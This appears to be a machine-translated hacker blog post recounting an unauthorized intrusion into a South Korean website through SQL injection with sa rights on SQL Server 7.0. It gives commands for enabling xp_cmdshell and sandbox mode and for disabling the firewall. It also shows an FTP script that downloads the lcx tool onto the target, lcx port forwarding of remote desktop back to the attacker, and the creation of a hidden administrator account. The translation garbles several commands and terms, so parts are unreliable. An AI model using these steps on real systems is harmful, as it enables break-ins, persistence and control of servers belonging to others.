Sa permission + window2000 + sqlserver 7.00 penetration

In the afternoon, I made a website, sa injection point, window 2000 + iis5.

Through the injection of some information, we found that the sqlserver version is 7.00. I have seen this version before, but I didn't have any in-depth research. My friend scanned the weak password and also raised the right, I forgot how to mention it. Figure.

.

Scan this IP address and find that only 53 and 80 are open to the outside world. The bird station in South Korea is suspected to be an intranet or internet, but the port opened to the outside world is limited. Generally, 1433 is enabled, but the connection with 3389 is restricted.

Although I used sqlserver7.0 before, I forgot how to solve it. So I will use the features provided by pangolin to restore them step by step.Xp_cmdshell, sp_oa **, sp _ *** job, And sandboxmode sandbox mode. After the command is enabled, You can execute the set, ipconfig, and other commands to find that no echo is displayed, and you do not know which component can run the command. So I thought of a method.

Now I run lcx-listen 77 88 on the local machine to listen to external data through port 77. Then execute net stop sharedaccess in Pangolin through xp_mongoshell, and then execute sp_oa **, sp _ *** job and sandbox mode one by one. Although I do not know whether the operation is successful, but if you can execute the command, it will certainly succeed, in order that the other machine can send data externally. Then, execute telnet to port 22 of my ip address just now, and finally find that the command can be executed in sandbox mode.

However, the other party's 3389 is not allowed to be connected. At this time, we want to use lcx port forwarding to connect to the other party's 3389. Although we are not sure it is 3389, we have a chance.

At this time, I thought of an article. There are nine methods for uploading sa permissions, article address.

Http://hi.baidu.com/hackxiaolong/blog/item/bdd6cea3316e20a1caefd06c.html

I personally tested the ftp file for downloading and used it.

Echo openWww.ftp.com> ftp. TXT// Connect to FTP
Echo username> ftp. TXT // enter the user name
Echo password> ftp. TXT // enter the password
Echo get lcx c: lcx.exe> ftp. TXT // run the download command.
Echo bye> ftp. TXT // exit
Ftp-s: ftp.txt // runFTP. TXTFile FTP commands
Execute the following statements in sequence in Pangolin. Lcx is downloaded to the directory of drive C of the target machine.

Then run c:/lcx.exe-slave my ip 77 127.0.0.1 3389 in shahe mode.

The local machine executes lcx-listen 77 88.

After a short time, we will find that data has been returned, which proves that lcx has been passed in and forwarded to the local machine through port 3389.

Connect 127.0.0.1: 88 to the terminal, and run the "net user password/add" command to add a user in Pangolin.

. Net localgroup administrators user/add connection terminal ..

By: Long erxin